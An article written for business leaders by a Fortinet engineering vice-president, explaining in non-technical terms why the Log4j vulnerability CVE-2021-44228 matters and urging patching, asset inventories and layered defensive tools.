Why we should care about digital vulnerability
If you are a business leader with little knowledge of the technical intricacies around cybersecurity, you may be wondering why the term “log4j” is suddenly everywhere.
Digital Transformation (DX) means pretty much every business is supported by technology in plenty of areas of the organisation: Human resources, marketing, production, operations, finance, customer service, etc. There is little room for not being digital and not being online in a hyperconnected world. Organisations have spent a great deal of budget on efforts related to DX because it means Business Transformation and evolution.
Part of the objectives of cybersecurity is to mitigate risk and ensure business continuity in a digital environment. “The show must go on” always, so goods keep being produced and shipped, customers get serviced and invoiced, and employees remain productive and happy. Another objective is resiliency: if by any chance the business gets interrupted, it must be quickly restored with the lowest amount of effort, impact and cost.
To achieve that, cybersecurity must be broad (deployed everywhere, protecting every digital asset), Integrated (the components must talk to each other and leverage efficiencies by doing that) and automated (so responses require very low human interaction). All of that to always bring visibility and ensure the technology infrastructure supporting the business is running well, and also avoid being disrupted by vulnerabilities (flaws in the technology that can be used by attackers to make computers do things they are not supposed to do).
Why Log4j is it relevant to the business?
There are very few cases when a vulnerability has an impact so severe that can potentially bring down services of any kind and everywhere. The vulnerability labelled CVE-2021-44228 discovered on a Java library (a set of code ready to be used, which saves development time) named Log4j, has this potential.
As it is known, Java is programming language and a platform that was created with the objective to create code (instructions for a computer) once and then run that code everywhere. The concept succeeded and today it is estimated that more than 15 billion devices run Java: laptops, tablets, cellphones to robots and home appliances. This means the Company web page, the billing system, the payroll, the robots in the production line, among others, may be potentially impacted if they use Java.
The vulnerability (the flaw) discovered is relevant because it can impact many devices in the world, it allows it to execute code (run instructions), but also because no much technical knowledge is required to take advantage of it and it can be used remotely. Given it’s relatively easy to do, more skilled adversaries can relatively easily automate attacks.
In other words, an average technical person could potentially do whatever they want with any device from a remote location. Changing instructions, run undesired programs, alter electronic records, launch additional attacks or shut down services. A more knowledgeable adversary could automate the steps and do more harm. A skilled adversary with more resources (think on organized cyber crime) can do real bad things for profit, such as gather sensitive data from your organization and extort you (cyberextortion), or hold your data hostage and then ask for a ransom (ransomware). Scary. At least initially.
What can be done?
If a similar vulnerability would have been discovered some years ago, it could have been catastrophic. With the technologies, the knowledge and the processes we have today, we don’t need to worry. We need to act.
The vulnerability was fixed already and there is a software update to solve it. But performing upgrades in all the affected devices will take some time. Sometimes it will require planning maintenance windows to lower business impact. And the business can’t stop.
Cybersecurity professionals have today at their disposal the technology resources to prevent a remote malicious user to trigger the vulnerability. This is what technologies like next generation firewalls and web application firewalls do. If by any chance the attempt to exploit is more sophisticated, technologies like endpoint detection and response can stop the malicious code while the attacker is running it. And from the records generated by the protection controls, cybersecurity personnel can use log analysis and reporting tools or security information event management platforms to detect if you have activity related to this vulnerability in your networks and act upon it, in an automated way. Eventually, a detailed step by step action plans can be developed for automated response with security orchestration, automation, and response platforms. Again: Broad, Integrated and Automated. And the bottom-line: there is technology available to help.
There are also processes and frameworks that help cybersecurity professionals to deal with situations like this, and services that can be obtained from companies with experience handling incidents, which you can leverage to avoid working on a trial-and-error basis that can be costly to the business due poor handling, and there are technologies that can protect in every single step. Again, what is relevant is that you act and protect the business.
How to support the efforts from the business management standpoint? urge your IT and Cybersecurity staff to create an inventory of their infrastructure, so they can upgrade any potentially vulnerable system at their earliest convenience. But also urge them to adapt the digital defence system so it avoids, contains and continuously monitors activity around this vulnerability. The cost and effort to respond as well as the impact to the overall business will be lower if the actions are executed earlier rather than later.
We will be OK. But we need to quickly react. And adapt, because eventually, there will be another similar event in the future. And we need to be better prepared. Because “the show must go on”.
— Martin Hoz, Vice-President Engineering, Fortinet Latin America and the Caribbean.